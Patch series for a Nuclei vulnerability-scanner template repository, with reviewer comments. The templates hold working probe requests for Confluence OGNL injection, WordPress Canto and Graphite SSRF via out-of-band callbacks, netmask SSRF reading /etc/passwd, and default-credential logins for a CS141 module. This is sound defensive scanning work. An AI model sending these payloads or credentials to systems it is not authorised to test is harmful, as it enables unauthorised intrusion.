@@ -4,7 +4,7 @@ info: name: Cacti v1.2.8 - Unauthenticated Remote Code Execution author: gy741 severity: critical - description: This vulnerability could be exploited without authentication if Cacti is enabling “Guest Realtime Graphs” privilege, So in this case no need for the authentication part and you can just use the following code to exploit the vulnerability + description: This vulnerability could be exploited without authentication if Cacti is enabling "Guest Realtime Graphs" privilege, So in this case no need for the authentication part and you can just use the following code to exploit the vulnerability reference: | - https://shells.systems/cacti-v1-2-8-authenticated-remote-code-execution-cve-2020-8813/ tags: cve,cve2020,cacti,rce,oob diff --git a/cves/2020/CVE-2020-9496.yaml b/cves/2020/CVE-2020-9496.yaml index bf637b1ef7..e5f5e730c5 100644 --- a/cves/2020/CVE-2020-9496.yaml +++ b/cves/2020/CVE-2020-9496.yaml @@ -10,13 +10,12 @@ info: - http://packetstormsecurity.com/files/158887/Apache-OFBiz-XML-RPC-Java-Deserialization.html - http://packetstormsecurity.com/files/161769/Apache-OFBiz-XML-RPC-Java-Deserialization.html - - # This template detects a Java deserialization vulnerability in Apache - # OFBiz's unauthenticated XML-RPC endpoint /webtools/control/xmlrpc for - # versions prior to 17.12.04. - # -- - # References: - # - https://securitylab.github.com/advisories/GHSL-2020-069-apache_ofbiz + # This template detects a Java deserialization vulnerability in Apache + # OFBiz's unauthenticated XML-RPC endpoint /webtools/control/xmlrpc for + # versions prior to 17.12.04. + # -- + # References: + # - https://securitylab.github.com/advisories/GHSL-2020-069-apache_ofbiz requests: - raw: diff --git a/misconfiguration/java-melody-exposed.yaml b/misconfiguration/java-melody-exposed.yaml index 0139f7ec02..a2e2f0686d 100644 --- a/misconfiguration/java-melody-exposed.yaml +++ b/misconfiguration/java-melody-exposed.yaml 
@@ -4,7 +4,7 @@ info: name: JavaMelody Monitoring Exposed author: dhiyaneshDK,thomas_from_offensity severity: medium - description: JavaMelody is a tool used to monitor Java or Java EE applications in QA and production environments. JavaMelody was detected on this web application. One option in the dashboard is to “View http sessions”. This can be used by an attacker to steal a user’s session. + description: JavaMelody is a tool used to monitor Java or Java EE applications in QA and production environments. JavaMelody was detected on this web application. One option in the dashboard is to "View http sessions". This can be used by an attacker to steal a user’s session. reference: | - https://www.acunetix.com/vulnerabilities/web/javamelody-publicly-accessible/ - https://github.com/javamelody/javamelody/wiki/UserGuide#16-security diff --git a/vulnerabilities/other/mcafee-epo-rce.yaml b/vulnerabilities/other/mcafee-epo-rce.yaml index 8524264b95..8d8f248d89 100644 --- a/vulnerabilities/other/mcafee-epo-rce.yaml +++ b/vulnerabilities/other/mcafee-epo-rce.yaml @@ -8,7 +8,7 @@ info: A ZipSlip vulnerability in McAfee ePolicy Orchestrator (ePO) is a type of Path Traversal occurring when archives are unpacked if the names of the packed files are not properly sanitized. - An attacker can create archives with files containing “../” in their names, + An attacker can create archives with files containing "../" in their names, making it possible to upload arbitrary files to arbitrary directories or overwrite existing ones during archive extraction. diff --git a/vulnerabilities/other/netgear-router-auth-bypass.yaml b/vulnerabilities/other/netgear-router-auth-bypass.yaml index f2d94ceba8..c558f9bfde 100644 --- a/vulnerabilities/other/netgear-router-auth-bypass.yaml +++ b/vulnerabilities/other/netgear-router-auth-bypass.yaml 
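Review bot: The replaced description line in misconfiguration/java-melody-exposed.yaml still contains the curly apostrophe in `user’s session` while the same line swaps the curly double quotes for ASCII ones, so the non-ASCII punctuation this commit is removing is only partly fixed here: `user's session`. A quick search for `’` across the other ten files in the commit would catch any remaining ones.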
@@ -4,7 +4,7 @@ info: name: Netgear DGN2200v1 Router Authentication Bypass author: gy741 severity: high - description: NETGEAR decided to use to check if a page has “.jpg”, “.gif” or “ess_” substrings, trying to match the entire URL. We can therefore access any page on the device, including those that require authentication, by appending a GET variable with the relevant substring (like “?.gif”). + description: NETGEAR decided to use to check if a page has ".jpg", ".gif" or "ess_" substrings, trying to match the entire URL. We can therefore access any page on the device, including those that require authentication, by appending a GET variable with the relevant substring (like "?.gif"). reference: | - https://www.microsoft.com/security/blog/2021/06/30/microsoft-finds-new-netgear-firmware-vulnerabilities-that-could-lead-to-identity-theft-and-full-system-compromise/ - https://kb.netgear.com/000062646/Security-Advisory-for-Multiple-HTTPd-Authentication-Vulnerabilities-on-DGN2200v1 From 5ae8bf50889c0a39900fe66312cde19317810441 Mon Sep 17 00:00:00 2001 From: socketz Date: Wed, 25 Aug 2021 14:32:17 +0200 Subject: [PATCH 14/35] Added CS141 SNMP template to default-logins --- default-logins/abb/cs141-default-login.yaml | 64 +++++++++++++++++++++ 1 file changed, 64 insertions(+) create mode 100644 default-logins/abb/cs141-default-login.yaml diff --git a/default-logins/abb/cs141-default-login.yaml b/default-logins/abb/cs141-default-login.yaml new file mode 100644 index 0000000000..25b6b8a36e --- /dev/null +++ b/default-logins/abb/cs141-default-login.yaml 
@@ -0,0 +1,64 @@ +id: cs141-default-login + +info: + name: CS141 SNMP Module Default Credentials + author: socketz + severity: medium + reference: https://www.generex.de/media/pages/packages/documents/manuals/f65348d5b6-1628841637/manual_CS141_en.pdf + tags: hiawatha,iot,default-login + +requests: + - raw: + - | + POST /api/login HTTP/1.1 + Host: {{Hostname}} + Content-Length: 44 + Accept: application/json, text/plain, */* + Content-Type: application/json + Accept-Encoding: gzip, deflate + Accept-Language: en,es-ES;q=0.9,es;q=0.8 + Connection: close + + {"userName":"admin","password":"cs141-snmp"} + + - | + POST /api/login HTTP/1.1 + Host: {{Hostname}} + Content-Length: 44 + Accept: application/json, text/plain, */* + Content-Type: application/json + Accept-Encoding: gzip, deflate + Accept-Language: en,es-ES;q=0.9,es;q=0.8 + Connection: close + + {"userName":"engineer","password":"engineer"} + + - | + POST /api/login HTTP/1.1 + Host: {{Hostname}} + Content-Length: 44 + Accept: application/json, text/plain, */* + Content-Type: application/json + Accept-Encoding: gzip, deflate + Accept-Language: en,es-ES;q=0.9,es;q=0.8 + Connection: close + + {"userName":"guest","password":"guest"} + + matchers-condition: and + matchers: + - type: word + words: + - 'accessToken' + - 'application/json' + condition: and + part: header + + - type: status + status: + - 200 + + extractors: + - type: kval + kval: + - accessToken From 35570987e0eb68170e1e129bfc6d0dd11dd99326 Mon Sep 17 00:00:00 2001 From: socketz Date: Wed, 25 Aug 2021 14:47:28 +0200 Subject: [PATCH 15/35] Removed useless template --- .../http-present-security-headers.yaml | 116 ------------------ 1 file changed, 116 deletions(-) delete mode 100644 miscellaneous/http-present-security-headers.yaml diff --git a/miscellaneous/http-present-security-headers.yaml b/miscellaneous/http-present-security-headers.yaml deleted file mode 100644 index 66b98f6ea2..0000000000 
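Review bot: The hardcoded `Content-Length: 44` fits only the first body; `{"userName":"engineer","password":"engineer"}` is 45 bytes and `{"userName":"guest","password":"guest"}` is 39, so the second and third raw requests declare a wrong length. Nuclei may recompute the header for raw requests that are not marked `unsafe`, but if the literal value is honoured the engineer body is cut short by one byte and the guest request waits for five bytes that never come, so neither credential pair is actually tested. Drop the `Content-Length:` line from all three requests and let the engine set it. The `Accept-Encoding` and `Accept-Language` headers add nothing to the check and could be removed at the same time.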
--- a/miscellaneous/http-present-security-headers.yaml +++ /dev/null 
@@ -1,116 +0,0 @@ -id: http-present-security-headers - -info: - name: HTTP Present Security Headers - author: socketz - severity: info - description: It searches present security headers, but obviously, could be so less generic and could be useless for Bug Bounty. - tags: config,headers - -requests: - - method: GET - path: - - "{{BaseURL}}" - redirects: true - max-redirects: 3 - extractors: - - type: regex - part: header - group: 0 - regex: - - "(?im)(Strict-Transport-Security):(.*)" - - type: regex - part: header - group: 0 - regex: - - "(?im)(X-Frame-Options):(.*)" - - type: regex - part: header - group: 0 - regex: - - "(?im)(X-Content-Type-Options):(.*)" - - type: regex - part: header - group: 0 - regex: - - "(?im)(Content-Security-Policy):(.*)" - - type: regex - part: header - group: 0 - regex: - - "(?im)(X-Permitted-Cross-Domain-Policies):(.*)" - - type: regex - part: header - group: 0 - regex: - - "(?im)(Referrer-Policy):(.*)" - - type: regex - part: header - group: 0 - regex: - - "(?im)(Clear-Site-Data):(.*)" - - type: regex - part: header - group: 0 - regex: - - "(?im)(Cross-Origin-Embedder-Policy):(.*)" - - type: regex - part: header - group: 0 - regex: - - "(?im)(Cross-Origin-Opener-Policy):(.*)" - - type: regex - part: header - group: 0 - regex: - - "(?im)(Cross-Origin-Resource-Policy):(.*)" - - type: regex - part: header - group: 0 - regex: - - "(?im)(X-XSS-Protection):(.*)" - - type: regex - part: header - group: 0 - regex: - - "(?im)(Public-Key-Pins):(.*)" - - type: regex - part: header - group: 0 - regex: - - "(?im)(Except-CT):(.*)" - - type: regex - part: header - group: 0 - regex: - - "(?im)(Feature-Policy):(.*)" - - type: regex - part: header - group: 0 - regex: - - "(?im)(Permissions-Policy):(.*)" - - type: regex - part: header - group: 0 - regex: - - "(?im)(Document-Policy):(.*)" - - type: regex - part: header - group: 0 - regex: - - "(?im)(X-XSRF-TOKEN):(.*)" - - type: regex - part: header - group: 0 - regex: - - "(?im)(X-CSRF-TOKEN):(.*)" - - 
type: regex - part: header - group: 0 - regex: - - "(?im)(X-CSRFToken):(.*)" - - type: regex - part: header - group: 0 - regex: - - "(?im)(Authorization):(.*)" From 5472deb9b4b6ee53e31e6a3c4e26ec77fe14cfed Mon Sep 17 00:00:00 2001 From: sandeep Date: Thu, 26 Aug 2021 14:05:10 +0530 Subject: [PATCH 16/35] Update cs141-default-login.yaml --- default-logins/abb/cs141-default-login.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/default-logins/abb/cs141-default-login.yaml b/default-logins/abb/cs141-default-login.yaml index 25b6b8a36e..cb51eede2c 100644 --- a/default-logins/abb/cs141-default-login.yaml +++ b/default-logins/abb/cs141-default-login.yaml @@ -20,7 +20,7 @@ requests: Connection: close {"userName":"admin","password":"cs141-snmp"} - + - | POST /api/login HTTP/1.1 Host: {{Hostname}} From c2048eb6b596559b67f3ddef363b62b17c3f0a7a Mon Sep 17 00:00:00 2001 From: sandeep Date: Thu, 2 Sep 2021 22:07:29 +0530 Subject: [PATCH 17/35] Added CVE-2021-22145 Co-Authored-By: Dhiyaneshwaran --- cves/2021/CVE-2021-22145.yaml | 36 +++++++++++++++++++++++++++++++++++ 1 file changed, 36 insertions(+) create mode 100644 cves/2021/CVE-2021-22145.yaml diff --git a/cves/2021/CVE-2021-22145.yaml b/cves/2021/CVE-2021-22145.yaml new file mode 100644 index 0000000000..e018f535d1 --- /dev/null +++ b/cves/2021/CVE-2021-22145.yaml 
@@ -0,0 +1,36 @@ +id: CVE-2021-22145 + +info: + name: ElasticSearch 7.13.3 - Memory disclosure + author: dhiyaneshDk + severity: medium + description: A memory disclosure vulnerability was identified in Elasticsearch 7.10.0 to 7.13.3 error reporting. A user with the ability to submit arbitrary queries to Elasticsearch could submit a malformed query that would result in an error message returned containing previously used portions of a data buffer. This buffer could contain sensitive information such as Elasticsearch documents or authentication details. + reference: + - https://github.com/jaeles-project/jaeles-signatures/blob/e9595197c80521d64e31b846808095dd07c407e9/cves/elasctic-memory-leak-cve-2021-22145.yaml + - https://nvd.nist.gov/vuln/detail/CVE-2021-22145 + - https://packetstormsecurity.com/files/163648/ElasticSearch-7.13.3-Memory-Disclosure.html + tags: cve,cve2021,elascticsearch + +requests: + - method: POST + path: + - '{{BaseURL}}/_bulk' + headers: + Content-Type: application/json + body: | + @ + + matchers-condition: and + matchers: + + - type: word + words: + - 'root_cause' + - 'truncated' + - 'reason' + part: body + condition: and + + - type: status + status: + - 400 From fb0aabfe968068b3d0748d1194e720b5c20b8c96 Mon Sep 17 00:00:00 2001 From: Philippe Delteil Date: Thu, 2 Sep 2021 13:35:07 -0400 Subject: [PATCH 18/35] Update CVE-2021-26084.yaml Extra paths were I did found vulnerable assets --- cves/2021/CVE-2021-26084.yaml | 20 ++++++++++++++++++-- 1 file changed, 18 insertions(+), 2 deletions(-) diff --git a/cves/2021/CVE-2021-26084.yaml b/cves/2021/CVE-2021-26084.yaml index c37f54cd81..8ed6fb59a8 100644 --- a/cves/2021/CVE-2021-26084.yaml +++ b/cves/2021/CVE-2021-26084.yaml 
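Review bot: The `tags:` line spells the product `elascticsearch`, so tag-based selection such as `-tags elasticsearch` will skip this template and it will not group with other Elasticsearch templates; change it to `tags: cve,cve2021,elasticsearch`. The same misspelling is part of the jaeles reference filename, which is presumably where it was copied from, but that URL must stay verbatim. A one-line comment above `body: |` would also help the next maintainer, since the lone `@` looks like a typo: `# a single invalid byte forces a parse error; affected versions echo stale buffer contents in the error reason`.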
@@ -1,7 +1,7 @@ id: CVE-2021-26084 info: - author: dhiyaneshDk + author: dhiyaneshDk,philippedelteil severity: critical name: Confluence Server OGNL injection - RCE description: In affected versions of Confluence Server and Data Center, an OGNL injection vulnerability exists that would allow an authenticated user, and in some instances an unauthenticated user, to execute arbitrary code on a Confluence Server or Data Center instance. The vulnerable endpoints can be accessed by a non-administrator user or unauthenticated user if ‘Allow people to sign up to create their account’ is enabled. To check whether this is enabled go to COG > User Management > User Signup Options. The affected versions are before version 6.13.23, from version 6.14.0 before 7.4.11, from version 7.5.0 before 7.11.6, and from version 7.12.0 before 7.12.5. @@ -19,7 +19,23 @@ requests: Content-Type: application/x-www-form-urlencoded queryString=aaaa\u0027%2b#{16*8787}%2b\u0027bbb + - raw: + - | + POST /confluence/pages/createpage-entervariables.action?SpaceKey=x HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + queryString=aaaa\u0027%2b#{16*8787}%2b\u0027bbb + + - raw: + - | + POST /wiki/pages/createpage-entervariables.action?SpaceKey=x HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + queryString=aaaa\u0027%2b#{16*8787}%2b\u0027bbb + + stop-at-first-match: true matchers-condition: and matchers: - type: status @@ -29,4 +45,4 @@ requests: - type: word part: body words: - - 'value="aaaa{140592=null}' \ No newline at end of file + - 'value="aaaa{140592=null}' From f0197ae9ac301013a81d974d54b5d2cb72e58b10 Mon Sep 17 00:00:00 2001 From: LogicalHunter Date: Thu, 2 Sep 2021 12:13:21 -0700 Subject: [PATCH 19/35] Added CVE-2020-28976.yaml Template --- cves/2020/CVE-2020-28976.yaml | 24 ++++++++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 cves/2020/CVE-2020-28976.yaml 
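Review bot: The first added raw request (`POST /confluence/pages/createpage-entervariables.action`) has no blank line between `Content-Type: application/x-www-form-urlencoded` and `queryString=...`, whereas the second added `/wiki/` request does; without the separator the body line is likely to be parsed as a malformed header and the form field never reaches the server. Insert an empty line before `queryString=` in that block, exactly as in the `/wiki/` block. The three raw blocks differ only in their path prefix, so a single request with a `payloads:` list for the prefix would keep the header/body layout in one place. The `@@ -1,7 +1,7 @@` and `@@ -29,4 +45,4 @@` hunks are author and EOF-newline changes only.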
diff --git a/cves/2020/CVE-2020-28976.yaml b/cves/2020/CVE-2020-28976.yaml new file mode 100644 index 0000000000..c3cb68cde0 --- /dev/null +++ b/cves/2020/CVE-2020-28976.yaml @@ -0,0 +1,24 @@ +id: CVE-2020-28976 + +info: + name: Wordpress Plugin Canto 1.3.0 - Blind SSRF (Unauthenticated) + author: LogicalHunter + severity: high + reference: + - https://www.exploit-db.com/exploits/49189 + - https://nvd.nist.gov/vuln/detail/CVE-2020-28976 + tags: cve,cve2020,ssrf,wordpress,wp-plugin + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/canto/includes/lib/detail.php?subdomain={{interactsh-url}}" + - "{{BaseURL}}/wp-content/plugins/canto/includes/lib/get.php?subdomain={{interactsh-url}}" + - "{{BaseURL}}/wp-content/plugins/canto/includes/lib/tree.php?subdomain={{interactsh-url}}" + + matchers: + - type: word + part: interactsh-protocol + words: + - "http" + From 6e7c3ab0a2aa55829d42e467249edce69dbfdb14 Mon Sep 17 00:00:00 2001 From: Borna Nematzadeh <88947751+LogicalHunter@users.noreply.github.com> Date: Thu, 2 Sep 2021 12:26:10 -0700 Subject: [PATCH 20/35] Update CVE-2020-28976.yaml --- cves/2020/CVE-2020-28976.yaml | 2 -- 1 file changed, 2 deletions(-) diff --git a/cves/2020/CVE-2020-28976.yaml b/cves/2020/CVE-2020-28976.yaml index c3cb68cde0..b7189961be 100644 --- a/cves/2020/CVE-2020-28976.yaml +++ b/cves/2020/CVE-2020-28976.yaml @@ -15,10 +15,8 @@ requests: - "{{BaseURL}}/wp-content/plugins/canto/includes/lib/detail.php?subdomain={{interactsh-url}}" - "{{BaseURL}}/wp-content/plugins/canto/includes/lib/get.php?subdomain={{interactsh-url}}" - "{{BaseURL}}/wp-content/plugins/canto/includes/lib/tree.php?subdomain={{interactsh-url}}" - matchers: - type: word part: interactsh-protocol words: - "http" - From 58a886ad6e7657bfe4ff9789659769edd8400ec6 Mon Sep 17 00:00:00 2001 
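Review bot: `part: interactsh-protocol` is not the key nuclei exposes for out-of-band matchers; the engine's name is `interactsh_protocol` (underscore), so as committed the matcher can never match and the template stays silent even against an affected host. Change it to `part: interactsh_protocol`. The `info` block is also missing a `description:`, which the other CVE templates in this series carry, and the file ends with two stray blank lines.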
From: Prince Chaddha Date: Fri, 3 Sep 2021 09:24:21 +0530 Subject: [PATCH 21/35] Update CVE-2020-28976.yaml --- cves/2020/CVE-2020-28976.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/cves/2020/CVE-2020-28976.yaml b/cves/2020/CVE-2020-28976.yaml index b7189961be..97b6dcc096 100644 --- a/cves/2020/CVE-2020-28976.yaml +++ b/cves/2020/CVE-2020-28976.yaml @@ -4,6 +4,7 @@ info: name: Wordpress Plugin Canto 1.3.0 - Blind SSRF (Unauthenticated) author: LogicalHunter severity: high + description: The Canto plugin 1.3.0 for WordPress contains a blind SSRF vulnerability. It allows an unauthenticated attacker can make a request to any internal and external server via /includes/lib/detail.php?subdomain=SSRF. reference: - https://www.exploit-db.com/exploits/49189 - https://nvd.nist.gov/vuln/detail/CVE-2020-28976 @@ -17,6 +18,6 @@ requests: - "{{BaseURL}}/wp-content/plugins/canto/includes/lib/tree.php?subdomain={{interactsh-url}}" matchers: - type: word - part: interactsh-protocol + part: interactsh_protocol words: - "http" From 56af312e250265fb02590ea718cab1d4a2f5ca46 Mon Sep 17 00:00:00 2001 From: John Jackson <39013067+johnjhacking@users.noreply.github.com> Date: Thu, 2 Sep 2021 22:48:24 -0600 Subject: [PATCH 22/35] Added an additional check Hello, when you get the change, please check the changes. I removed some of the methods and cleaned it up + made a matcher for /etc/passwd. Thanks! --- cves/2021/CVE-2021-28918.yaml | 17 +++++++++++------ 1 file changed, 11 insertions(+), 6 deletions(-) diff --git a/cves/2021/CVE-2021-28918.yaml b/cves/2021/CVE-2021-28918.yaml index 1f0f3c4456..8256fd4662 100644 --- a/cves/2021/CVE-2021-28918.yaml +++ b/cves/2021/CVE-2021-28918.yaml 
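Review bot: The added `description:` reads "allows an unauthenticated attacker can make a request", which is ungrammatical; suggest `description: The Canto plugin 1.3.0 for WordPress contains a blind SSRF vulnerability. It allows an unauthenticated attacker to make a request to any internal or external server via /includes/lib/detail.php?subdomain=SSRF.` The text names only `detail.php`, while the request list also probes `get.php` and `tree.php`; naming all three keeps the description and the paths in step. The surrounding `requests:` block starts outside this hunk.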
@@ -1,7 +1,7 @@ id: CVE-2021-28918 info: - name: Netmask NPM Package SSRF + name: Netmask npm Package SSRF author: johnjhacking severity: critical description: Improper input validation of octal strings in netmask npm package allows unauthenticated remote attackers to perform indeterminate SSRF, RFI, and LFI attacks on many of the dependent packages. A remote unauthenticated attacker can bypass packages relying on netmask to filter IPs and reach critical VPN or LAN hosts. @@ -15,19 +15,24 @@ requests: - method: GET path: - "{{BaseURL}}/?url=http://0177.0.0.1/server-status" - - "{{BaseURL}}/?uri=http://0177.0.0.1/server-status" - - "{{BaseURL}}/?dest=http://0177.0.0.1/server-status" - - "{{BaseURL}}/?redirect=http://0177.0.0.1/server-status" + - "{{BaseURL}}/?host=http://0177.0.0.1/server-status" + - "{{BaseURL}}/?file=http://0177.0.0.1/etc/passwd" matchers-condition: and matchers: - type: status status: - 200 - + - type: word part: body words: - "Apache Server Status" - "Server Version" - condition: and \ No newline at end of file + condition: and + + - type: word + part: body + words: + - "root:x:0:0:root:" + condition: or From 2d104a005348741262a7bce6a0fc028d6f825e01 Mon Sep 17 00:00:00 2001 From: sandeep Date: Fri, 3 Sep 2021 12:40:20 +0530 Subject: [PATCH 23/35] Added multiple endpoint support --- cves/2021/CVE-2021-26084.yaml | 33 ++++++++++++++++----------------- 1 file changed, 16 insertions(+), 17 deletions(-) diff --git a/cves/2021/CVE-2021-26084.yaml b/cves/2021/CVE-2021-26084.yaml index 8ed6fb59a8..1ef19a23c1 100644 --- a/cves/2021/CVE-2021-26084.yaml +++ b/cves/2021/CVE-2021-26084.yaml 
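Review bot: With `matchers-condition: and`, the new `root:x:0:0:root:` word matcher can never succeed on its own: every matcher must pass, so a response also has to contain both `Apache Server Status` and `Server Version`, and the `?file=http://0177.0.0.1/etc/passwd` path added in the same hunk cannot produce a hit by itself. Either switch to `matchers-condition: or` (keeping the status check inside each branch via a `dsl` matcher), or drop the passwd path until the matcher logic supports it. The `condition: or` on the single-word passwd matcher is a no-op and can be removed. The `status` matcher and the head of the `requests:` block are context lines above this hunk.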
@@ -8,34 +8,33 @@ info: tags: cve,cve2021,rce,confluence reference: - https://jira.atlassian.com/browse/CONFSERVER-67940 - - https://github.com/httpvoid/writeups/blob/main/Confluence-RCE.md + - https://github.com/httpvoid/CVE-Reverse/tree/master/CVE-2021-26084 - https://nvd.nist.gov/vuln/detail/CVE-2021-26084 + - https://github.com/Udyz/CVE-2021-26084 requests: - raw: - | - POST /pages/createpage-entervariables.action?SpaceKey=x HTTP/1.1 + POST /{{path}} HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded queryString=aaaa\u0027%2b#{16*8787}%2b\u0027bbb - - raw: - - | - POST /confluence/pages/createpage-entervariables.action?SpaceKey=x HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - queryString=aaaa\u0027%2b#{16*8787}%2b\u0027bbb - - - raw: - - | - POST /wiki/pages/createpage-entervariables.action?SpaceKey=x HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded + payloads: + path: + - pages/createpage-entervariables.action?SpaceKey=x + - confluence/pages/createpage-entervariables.action?SpaceKey=x + - wiki/pages/createpage-entervariables.action?SpaceKey=x + - pages/doenterpagevariables.action + - pages/createpage.action?spaceKey=myproj + - pages/templates2/viewpagetemplate.action + - pages/createpage-entervariables.action + - template/custom/content-editor + - templates/editor-preload-container + - users/user-dark-features - queryString=aaaa\u0027%2b#{16*8787}%2b\u0027bbb - - stop-at-first-match: true + stop-at-first-match: true matchers-condition: and matchers: - type: status From c41a4985053c4e73c41b66ef67668a5a19b70b8b Mon Sep 17 00:00:00 2001 From: sandeep Date: Fri, 3 Sep 2021 12:52:27 +0530 Subject: [PATCH 24/35] added tags --- cves/2020/CVE-2020-28976.yaml | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/cves/2020/CVE-2020-28976.yaml b/cves/2020/CVE-2020-28976.yaml index 97b6dcc096..00e084429e 100644 --- a/cves/2020/CVE-2020-28976.yaml 
+++ b/cves/2020/CVE-2020-28976.yaml @@ -8,7 +8,7 @@ info: reference: - https://www.exploit-db.com/exploits/49189 - https://nvd.nist.gov/vuln/detail/CVE-2020-28976 - tags: cve,cve2020,ssrf,wordpress,wp-plugin + tags: cve,cve2020,ssrf,wordpress,wp-plugin,oob requests: - method: GET @@ -16,6 +16,8 @@ requests: - "{{BaseURL}}/wp-content/plugins/canto/includes/lib/detail.php?subdomain={{interactsh-url}}" - "{{BaseURL}}/wp-content/plugins/canto/includes/lib/get.php?subdomain={{interactsh-url}}" - "{{BaseURL}}/wp-content/plugins/canto/includes/lib/tree.php?subdomain={{interactsh-url}}" + + stop-at-first-match: true matchers: - type: word part: interactsh_protocol From f81851b53b19e234744b4380514193125892f919 Mon Sep 17 00:00:00 2001 From: sandeep Date: Fri, 3 Sep 2021 13:10:35 +0530 Subject: [PATCH 25/35] few fixes --- cves/2021/CVE-2021-28918.yaml | 21 ++++++++------------- 1 file changed, 8 insertions(+), 13 deletions(-) diff --git a/cves/2021/CVE-2021-28918.yaml b/cves/2021/CVE-2021-28918.yaml index 8256fd4662..f7008e8785 100644 --- a/cves/2021/CVE-2021-28918.yaml +++ b/cves/2021/CVE-2021-28918.yaml @@ -1,12 +1,12 @@ id: CVE-2021-28918 info: - name: Netmask npm Package SSRF + name: Netmask NPM Package SSRF author: johnjhacking severity: critical description: Improper input validation of octal strings in netmask npm package allows unauthenticated remote attackers to perform indeterminate SSRF, RFI, and LFI attacks on many of the dependent packages. A remote unauthenticated attacker can bypass packages relying on netmask to filter IPs and reach critical VPN or LAN hosts. tags: cve,cve2021,npm,netmask,ssrf,lfi - reference: | + reference: - https://github.com/sickcodes/security/blob/master/advisories/SICK-2021-011.md - https://nvd.nist.gov/vuln/detail/CVE-2021-28918 - https://github.com/advisories/GHSA-pch5-whg9-qr2r 
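Review bot: `stop-at-first-match: true` is unlikely to shorten this template, because its only matcher is on `interactsh_protocol` and, as far as I can tell, the out-of-band hit is learned by polling the interactsh server after the request rather than from the response that stop-at-first-match inspects, so all three paths will still be sent. If one probe is enough, trim the path list instead; otherwise the key is harmless but misleading, and a comment such as `# stop-at-first-match does not short-circuit OOB-only matchers` would save the next reader the same question. The added `oob` tag is correct and matches the other interactsh templates in this series.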
@@ -18,21 +18,16 @@ requests: - "{{BaseURL}}/?host=http://0177.0.0.1/server-status" - "{{BaseURL}}/?file=http://0177.0.0.1/etc/passwd" - matchers-condition: and + stop-at-first-match: true + matchers-condition: or matchers: - - type: status - status: - - 200 - - type: word part: body words: - "Apache Server Status" - "Server Version" condition: and - - - type: word - part: body - words: - - "root:x:0:0:root:" - condition: or + + - type: regex + regex: + - "root:.*:0:0:" From eea43b6304efc07539eabe46dbed4324fc4d253f Mon Sep 17 00:00:00 2001 From: sandeep Date: Fri, 3 Sep 2021 13:14:24 +0530 Subject: [PATCH 26/35] Update CVE-2021-28918.yaml --- cves/2021/CVE-2021-28918.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/cves/2021/CVE-2021-28918.yaml b/cves/2021/CVE-2021-28918.yaml index f7008e8785..d591e23f66 100644 --- a/cves/2021/CVE-2021-28918.yaml +++ b/cves/2021/CVE-2021-28918.yaml @@ -7,9 +7,9 @@ info: description: Improper input validation of octal strings in netmask npm package allows unauthenticated remote attackers to perform indeterminate SSRF, RFI, and LFI attacks on many of the dependent packages. A remote unauthenticated attacker can bypass packages relying on netmask to filter IPs and reach critical VPN or LAN hosts. tags: cve,cve2021,npm,netmask,ssrf,lfi reference: - - https://github.com/sickcodes/security/blob/master/advisories/SICK-2021-011.md - - https://nvd.nist.gov/vuln/detail/CVE-2021-28918 - - https://github.com/advisories/GHSA-pch5-whg9-qr2r + - https://github.com/sickcodes/security/blob/master/advisories/SICK-2021-011.md + - https://nvd.nist.gov/vuln/detail/CVE-2021-28918 + - https://github.com/advisories/GHSA-pch5-whg9-qr2r requests: - method: GET From 216c66771ff6d9fc1c8714e8066ae9395a72989c Mon Sep 17 00:00:00 2001 
From: sandeep Date: Fri, 3 Sep 2021 13:52:53 +0530 Subject: [PATCH 27/35] Added CVE-2017-18638 Co-Authored-By: bigzero <3676342+bigzero@users.noreply.github.com> --- cves/2017/CVE-2017-18638.yaml | 24 ++++++++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 cves/2017/CVE-2017-18638.yaml diff --git a/cves/2017/CVE-2017-18638.yaml b/cves/2017/CVE-2017-18638.yaml new file mode 100644 index 0000000000..ee5dd415b7 --- /dev/null +++ b/cves/2017/CVE-2017-18638.yaml @@ -0,0 +1,24 @@ +id: CVE-2017-18638 + +info: + name: Graphite "graphite.composer.views.send_email" SSRF + author: huowuzhao + severity: high + description: send_email in graphite-web/webapp/graphite/composer/views.py in Graphite through 1.1.5 is vulnerable to SSRF. The vulnerable SSRF endpoint can be used by an attacker to have the Graphite web server request any resource. The response to this SSRF request is encoded into an image file and then sent to an e-mail address that can be supplied by the attacker. Thus, an attacker can exfiltrate any information. + reference: + - http://blog.orange.tw/2017/07/how-i-chained-4-vulnerabilities-on.html + - https://github.com/graphite-project/graphite-web/issues/2008 + - https://github.com/advisories/GHSA-vfj6-275q-4pvm + - https://nvd.nist.gov/vuln/detail/CVE-2017-18638 + tags: cve,cve2017,graphite,ssrf,oob + +requests: + - method: GET + path: + - '{{BaseURL}}/composer/send_email?to={{rand_text_alpha(4)}}@{{rand_text_alpha(4)}}&url=http://{{interactsh-url}}' + + matchers: + - type: word + part: interactsh_protocol + words: + - "http" From 064cc0c29f97208d0244b2c62a9c4d3a9a3e9b6b Mon Sep 17 00:00:00 2001 From: sandeep Date: Fri, 3 Sep 2021 13:56:09 +0530 Subject: [PATCH 28/35] Update CVE-2017-18638.yaml Co-Authored-By: bigzeroo <39177268+bigzeroo@users.noreply.github.com> --- cves/2017/CVE-2017-18638.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) 
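Review bot: The `to=` address is built as `{{rand_text_alpha(4)}}@{{rand_text_alpha(4)}}`, a bare four-letter label with no TLD; the target's mail host may complete that label from its resolver search list, so the e-mail carrying the fetched resource could be handed to an unrelated internal host, or to a real domain if the random label happens to exist. Use a domain that is guaranteed never to resolve, e.g. `to={{rand_text_alpha(4)}}@{{rand_text_alpha(4)}}.invalid` (RFC 2606); the matcher only relies on the HTTP callback to `{{interactsh-url}}`, so the mail destination carries no detection value. The single-quoted path is otherwise fine and the `oob` tag is present.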
